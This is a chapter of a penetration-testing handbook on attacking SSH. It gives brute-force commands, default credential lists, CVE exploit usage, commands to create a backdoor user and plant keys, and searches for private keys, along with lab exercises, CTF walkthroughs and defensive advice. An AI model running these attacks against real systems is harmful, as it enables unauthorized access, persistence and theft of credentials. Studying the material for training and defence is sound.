Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

SSH (Port 22)

🕷️ Trapdoor Tip: SSH is often the first service attackers target after discovering it. Weak credentials, outdated versions, and misconfigurations are common entry points.

Quick Reference

# Quick Win Commands
nmap -p 22 -sV -sC [TARGET_IP]
ssh [username]@[TARGET_IP]
hydra -L users.txt -P passwords.txt ssh://[TARGET_IP]

Service Overview

What is SSH?

SSH (Secure Shell) is a cryptographic network protocol for secure remote system administration and file transfers. It provides:

  • Encrypted remote command execution
  • Secure file transfer (SCP, SFTP)
  • Port forwarding and tunneling
  • Key-based authentication

SSH is ubiquitous on Linux/Unix systems and increasingly common on Windows servers.

Common Ports

PortProtocolService Variant
22TCPStandard SSH
2222TCPAlternative SSH port

Manual Methods

# Netcat
nc -nv [TARGET_IP] 22

# Telnet
telnet [TARGET_IP] 22

# Example output:
# SSH-2.0-OpenSSH_7.4

Automated Tools

# Nmap banner grab
nmap -p 22 -sV [TARGET_IP]

# Nmap with scripts
nmap -p 22 --script ssh-* [TARGET_IP]

# Detailed version detection
nmap -p 22 --script ssh2-enum-algos [TARGET_IP]

Version Detection

# SSH client connection (shows version before auth)
ssh -v [TARGET_IP]

# Look for version in initial handshake
# Example: SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5

Enumeration

Enumeration Checklist

  • Banner grab and version detection
  • Check for username enumeration vulnerability
  • Test for weak encryption algorithms
  • Identify authentication methods supported
  • Look for known version-specific vulnerabilities

Username Enumeration

CVE-2018-15473 (OpenSSH < 7.7)

# Using exploit
python ssh_enum.py --target [TARGET_IP] --usernames users.txt

# Metasploit module
msfconsole
> use auxiliary/scanner/ssh/ssh_enumusers
> set RHOSTS [TARGET_IP]
> set USER_FILE users.txt
> run

Authentication Method Discovery

# Check supported auth methods
ssh -v [TARGET_IP]
# Look for: "Authentications that can continue: publickey,password"

# Test specific method
ssh -o PreferredAuthentications=password [TARGET_IP]

Algorithm Enumeration

# List supported algorithms
nmap -p 22 --script ssh2-enum-algos [TARGET_IP]

# Check for weak ciphers
nmap -p 22 --script ssh-auth-methods [TARGET_IP]

Authentication Attacks

Password Attacks

Brute Force with Hydra

# Single user
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://[TARGET_IP]

# Multiple users
hydra -L users.txt -P passwords.txt ssh://[TARGET_IP] -t 4

# With specific port
hydra -L users.txt -P passwords.txt ssh://[TARGET_IP]:2222

Brute Force with Medusa

# Basic usage
medusa -h [TARGET_IP] -u root -P passwords.txt -M ssh

# Multiple users
medusa -h [TARGET_IP] -U users.txt -P passwords.txt -M ssh -t 4

Brute Force with Nmap

# Nmap NSE script
nmap -p 22 --script ssh-brute --script-args userdb=users.txt,passdb=passwords.txt [TARGET_IP]

⚠️ Warning:

  • Many SSH servers have fail2ban or rate limiting
  • Use -t 4 or lower to avoid detection
  • Monitor for account lockouts

Default Credentials

Common default SSH credentials to try:

  • root:root
  • root:toor
  • admin:admin
  • pi:raspberry (Raspberry Pi)
  • ubuntu:ubuntu
  • user:user

Key-Based Authentication Attacks

Weak SSH Key Detection

# Check for weak keys
ssh-audit [TARGET_IP]

# Test key algorithms
ssh -Q key [TARGET_IP]

Private Key Exploitation

If you find a private key on a compromised system:

# Set proper permissions
chmod 600 id_rsa

# Connect with key
ssh -i id_rsa user@[TARGET_IP]

# If key is encrypted, crack passphrase
ssh2john id_rsa > id_rsa.hash
john --wordlist=rockyou.txt id_rsa.hash

Exploitation

Vulnerability Matrix

VersionCVESeverityExploit AvailableNotes
OpenSSH < 7.4CVE-2016-10009HighYesPrivilege escalation
OpenSSH < 7.7CVE-2018-15473MediumYesUsername enumeration
OpenSSH 2.3.x - 7.7CVE-2018-15919MediumNoUser enumeration timing
libssh 0.6+CVE-2018-10933CriticalYesAuthentication bypass

Known Vulnerabilities

Username Enumeration (CVE-2018-15473)

Affected Versions: OpenSSH < 7.7 Impact: Enumerate valid usernames

# Download exploit
git clone https://github.com/epi052/cve-2018-15473.git
cd cve-2018-15473

# Run enumeration
python3 ssh-username-enum.py --port 22 --userList /usr/share/seclists/Usernames/top-usernames-shortlist.txt [TARGET_IP]

LibSSH Authentication Bypass (CVE-2018-10933)

Affected Versions: libssh 0.6.0 - 0.8.3 Impact: Complete authentication bypass

# Using Metasploit
msfconsole
> use auxiliary/scanner/ssh/libssh_auth_bypass
> set RHOSTS [TARGET_IP]
> set SPAWN_PTY true
> run

# Manual exploitation
python libssh_bypass.py [TARGET_IP]

Common Misconfigurations

Misconfiguration 1: Password Authentication Enabled

Description: Password auth allows brute force attacks Check:

# From compromised system, check sshd_config
cat /etc/ssh/sshd_config | grep PasswordAuthentication

Misconfiguration 2: Root Login Permitted

Description: Direct root access increases risk Check:

cat /etc/ssh/sshd_config | grep PermitRootLogin

Misconfiguration 3: Weak Ciphers Enabled

Description: Vulnerable encryption algorithms Check:

nmap --script ssh2-enum-algos [TARGET_IP]

Post-Exploitation

Initial Access

# Establish SSH connection
ssh user@[TARGET_IP]

# With private key
ssh -i id_rsa user@[TARGET_IP]

# Specify port
ssh -p 2222 user@[TARGET_IP]

Port Forwarding & Tunneling

Local Port Forward

# Forward local port to remote service
ssh -L 8080:localhost:80 user@[TARGET_IP]
# Now access http://localhost:8080 to reach target's port 80

Remote Port Forward

# Forward remote port to your local service
ssh -R 9090:localhost:80 user@[TARGET_IP]
# Target can access your port 80 via their localhost:9090

Dynamic Port Forward (SOCKS Proxy)

# Create SOCKS proxy
ssh -D 1080 user@[TARGET_IP]

# Configure proxychains
echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf
proxychains nmap -sT [INTERNAL_IP]

Persistence

Add SSH Key

# Generate key pair
ssh-keygen -t rsa -b 4096

# Add public key to target
echo "your-public-key" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

Backdoor User

# Create backdoor user
useradd -m -s /bin/bash backdoor
echo "backdoor:password" | chpasswd
usermod -aG sudo backdoor

Credential Harvesting

# SSH keys on system
find / -name id_rsa 2>/dev/null
find / -name id_dsa 2>/dev/null
find / -name authorized_keys 2>/dev/null

# SSH configuration
cat ~/.ssh/config
cat /etc/ssh/sshd_config

# Known hosts (pivot targets)
cat ~/.ssh/known_hosts

Tools

Enumeration

  • Nmap: Port scanning and version detection
  • ssh-audit: Security audit tool
  • ssh-scan: SSH configuration scanner

Exploitation

  • Hydra: Fast password brute forcing
  • Medusa: Parallel password cracker
  • Metasploit: Exploitation framework
  • ssh2john: SSH key password cracking prep

Post-Exploitation

  • ProxyChains: SOCKS proxy routing
  • SSHuttle: VPN over SSH
  • sshpass: Non-interactive SSH password

Practical Lab

Setup

# Use Metasploitable or create Ubuntu VM
# Ensure SSH is running
sudo systemctl start ssh
sudo systemctl status ssh

Exercise 1: Enumeration

Objective: Enumerate SSH service and identify version Steps:

  1. Scan for SSH service
  2. Grab banner
  3. Identify exact version
  4. Check for vulnerabilities

Solution:

nmap -p 22 -sV [TARGET_IP]
nc [TARGET_IP] 22
searchsploit openssh [version]

Exercise 2: Brute Force Attack

Objective: Gain access using password attack Setup: Known username, weak password Steps:

  1. Create small wordlist with common passwords
  2. Use Hydra to brute force
  3. Login with discovered credentials

Solution:

hydra -l msfadmin -P /usr/share/wordlists/metasploit/common_passwords.txt ssh://[TARGET_IP]
ssh msfadmin@[TARGET_IP]

CTF Walkthroughs

HackTheBox: Lame

📹 Video Tutorial: Watch on YouTube

SSH Attack Path:

  1. Enumerate SSH (port 22)
nmap -p 22 -sV 10.10.10.3
  1. Note OpenSSH 4.7p1 version
  2. Check for known exploits
searchsploit openssh 4.7
  1. Pivot to other vulnerable services (SMB in this case)

TryHackMe: Basic Pentesting

📹 Video Tutorial: Watch on YouTube

SSH Attack Path:

  1. Discover SSH on port 22
  2. Find username through enumeration
  3. Brute force with rockyou.txt
hydra -l jan -P rockyou.txt ssh://[TARGET_IP]
  1. Login and escalate privileges

Common Mistakes

⚠️ Don’t:

  • Brute force without checking for rate limiting
  • Forget to check alternative ports (2222, etc.)
  • Ignore SSH keys found on compromised systems
  • Use high thread counts (triggers IDS/IPS)

Do:

  • Always enumerate version for CVE checks
  • Try default credentials first
  • Look for SSH keys in user directories
  • Use port forwarding for pivoting
  • Document successful credentials

Defense & Detection

Blue Team Perspective

How to detect SSH attacks:

  • Monitor /var/log/auth.log for failed login attempts
  • Use fail2ban to block brute force attempts
  • Alert on successful login from unusual IPs
  • Monitor for multiple failed authentication attempts

Mitigation strategies:

  • Disable password authentication (key-only)
  • Disable root login (PermitRootLogin no)
  • Use strong passwords/passphrases
  • Implement rate limiting
  • Use non-standard port (security through obscurity)
  • Enable 2FA (Google Authenticator)
  • Keep OpenSSH updated
  • Restrict source IPs with firewall rules

Additional Resources

Next: FTP (Port 21) Previous: HTTP/HTTPS